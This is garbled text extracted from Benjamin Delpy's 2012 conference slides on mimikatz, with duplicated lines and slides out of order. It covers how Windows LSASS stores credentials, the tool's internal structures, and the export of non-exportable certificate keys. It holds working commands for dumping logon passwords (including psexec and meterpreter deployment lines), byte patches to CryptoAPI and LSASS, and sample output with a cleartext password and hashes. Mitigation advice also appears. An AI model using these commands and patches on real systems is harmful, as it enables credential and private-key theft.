BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
